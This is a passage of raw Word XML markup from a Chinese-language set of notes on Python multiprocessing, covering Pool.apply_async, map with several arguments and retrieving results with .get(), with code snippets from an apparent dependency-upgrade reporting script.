        <w:t>(components_upgrade_num_weekly.Golang_upgrade_num_query, args=(int(days), ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D7A91C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    PHP_upgrade_num_thread = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>pool.apply_async</w:t>
      </w:r>
      <w:r>
        <w:t>(components_upgrade_num_weekly.PHP_upgrade_num_query,args=(db_record, int(days)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317F3BAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Python_upgrade_num_thread = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>pool.apply_async</w:t>
      </w:r>
      <w:r>
        <w:t>(components_upgrade_num_weekly.Python_upgrade_num_query,args=(db_record, int(days)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7920ADD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Java_upgrade_num_thread = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>pool.apply_async</w:t>
      </w:r>
      <w:r>
        <w:t>(components_upgrade_num_weekly.Java_upgrade_num_query,args=(db_record, int(days)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B9FD13" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # NodeJS_upgrade_num_thread = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>pool.apply_async</w:t>
      </w:r>
      <w:r>
        <w:t>(components_upgrade_num_weekly.Java_upgrade_num_query,args=(db_record, int(days)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2EB85C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">   pool.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A63A85E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    pool.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3EFD3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4785AD87" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:t>多线程运行后，取得返回值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5EFFDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    global_vuls_report_dict, upgrade_vuls_num_from_snyk = global_vuls_report_dict_thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8AA9BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Golang_upgrade_num = Golang_upgrade_num_thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9E733A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    PHP_upgrade_num = PHP_upgrade_num_thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B7616B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Python_upgrade_num = Python_upgrade_num_thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E212E8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Java_upgrade_num = Java_upgrade_num_thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A03812F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # NodeJS_upgrade_num = NodeJS_upgrade_num_thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337FB720" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45A1124D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F47FF58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="181BB7FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="543" w:name="_Toc159779978"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>map:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多参数任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="543"/>
    </w:p>
    <w:p w14:paraId="7A6D9F99" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A90B01C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def job(x ,y):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC10200" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return x * y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3676C66B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A6B9A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def job1(z):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682C4F9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return job(z[0], z[1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F76374" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BAF00B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="544" w:name="OLE_LINK18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BACFA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>pool = multiprocessing.Pool()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC5651" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>res = pool.map(job1, [(2, 3), (3, 4)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24481A73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>print res</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="544"/>
    <w:p w14:paraId="7D2B6A04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样就能达到传递多个参数的效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058F1D28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：如果需要得到多个结果可以传入多个元组在一个列表中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5E4B31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62777176" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="545" w:name="_Toc159779979"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>apply_async()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出多个迭代结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="545"/>
    </w:p>
    <w:p w14:paraId="1B48B3D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，如果要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> apply_async().get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果设置了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导致超市，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会报错。推荐写法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F279E70" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i in mp_list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF60109" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219281A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>r = i.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C848CCF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">            mp_list_tmp.append(r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541A89F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">        except subprocess.TimeoutExpired:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192B7504" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">            pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3334DB58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DCF7DFD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def job(x):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C20FD2B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return x * x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489D458B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5481C720" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C10A78" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    pool = multiprocessing.Pool()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BB4A07" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    res = [pool.apply_async(target=job, (i,)) for i in range(3)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D13BD5D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print [r.get() for r in res]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29549C49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DFC6DF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># apply_async().get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48138794" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3045135B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多进程的消息同步，需要将队列传给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pool.apply_async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>arg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650454AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7231BA7A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pool.apply_async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：调用立即返回而不是等待结果。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncResult</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回一个对象。你调用其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法以检索函数调用的结果。该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法将阻塞直到功能完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CBD2A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pool.apply(func, args, kwargs)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等效于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pool.apply_async(func, args, kwargs).get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5D4615" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pool.apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pool.apply_async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法还具有一个回调，则在函数完成时调用该回调。可以使用它来代替</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B565F62" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B95FE94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245454A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码如下，却始终不执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524038D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    GitPathsFile = "targetPaths.yaml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D0CC4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    with open(GitPathsFile, 'r', encoding='utf-8') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A4AB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        targetPaths = yaml.safe_load(f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C501BEE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        f.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C32B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E421AE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = Queue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090EDEE5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
